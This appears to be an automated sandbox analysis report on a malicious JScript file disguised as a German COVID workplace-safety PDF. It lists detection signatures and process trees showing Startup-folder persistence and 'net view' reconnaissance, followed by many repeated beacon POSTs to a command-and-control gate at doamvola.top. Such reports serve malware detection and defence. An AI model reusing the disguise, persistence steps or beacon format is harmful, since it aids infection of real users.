Loading ...

Play interactive tourEdit tour

Analysis Report Arbeitsschutzregel-Corona-September.pdf.js

Overview

General Information

Sample Name:Arbeitsschutzregel-Corona-September.pdf.js
Analysis ID:284440
MD5:cbb53b682fbddca875973ea4f826a1df
SHA1:56eb48fdb6084855df9e111f481b88f1ccffbd1e
SHA256:8e9a1693a52155ce2aa8758413e594128e3b5f3b9fb18ef2a1e4084156817443

Most interesting Screenshot:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
JScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
System process connects to network (likely due to code injection or exploit)
Drops script or batch files to the startup folder
Found C&C like URL pattern
May check the online IP address of the machine
Opens network shares
Performs a network lookup / discovery via net view
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Uses an obfuscated file name to hide its real file extension (double extension)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Found WSH timer for Javascript or VBS script (likely evasive script)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 6744 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Arbeitsschutzregel-Corona-September.pdf.js' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • cmd.exe (PID: 6960 cmdline: 'C:\Windows\System32\cmd.exe' /C net view > 'C:\Users\user\AppData\Local\Temp\rad17A1B.tmp' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • net.exe (PID: 7060 cmdline: net view MD5: 15534275EDAABC58159DD0F8607A71E5)
  • wscript.exe (PID: 6672 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Arbeitsschutzregel-Corona-September.pdf.js' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • cmd.exe (PID: 6064 cmdline: 'C:\Windows\System32\cmd.exe' /C net view > 'C:\Users\user\AppData\Local\Temp\radDC873.tmp' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 1164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • net.exe (PID: 6732 cmdline: net view MD5: 15534275EDAABC58159DD0F8607A71E5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Drops script at startup locationShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 6744, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Arbeitsschutzregel-Corona-September.pdf.js
Sigma detected: Net.exe ExecutionShow sources
Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net view , CommandLine: net view , CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: 'C:\Windows\System32\cmd.exe' /C net view > 'C:\Users\user\AppData\Local\Temp\rad17A1B.tmp', ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6960, ProcessCommandLine: net view , ProcessId: 7060

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus / Scanner detection for submitted sampleShow sources
Source: Arbeitsschutzregel-Corona-September.pdf.jsAvira: detected
Antivirus detection for dropped fileShow sources
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Arbeitsschutzregel-Corona-September.pdf.jsAvira: detection malicious, Label: JS/FileCoder.AI
Multi AV Scanner detection for domain / URLShow sources
Source: doamvola.topVirustotal: Detection: 6%Perma Link
Source: http://doamvola.top/gate.phpVirustotal: Detection: 6%Perma Link
Source: http://doamvola.top/Virustotal: Detection: 6%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: Arbeitsschutzregel-Corona-September.pdf.jsVirustotal: Detection: 40%Perma Link
Source: Arbeitsschutzregel-Corona-September.pdf.jsReversingLabs: Detection: 24%

Spreading:

barindex
Performs a network lookup / discovery via net viewShow sources
Source: unknownProcess created: C:\Windows\System32\net.exe net view
Source: unknownProcess created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior

Networking:

barindex
Found C&C like URL patternShow sources
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
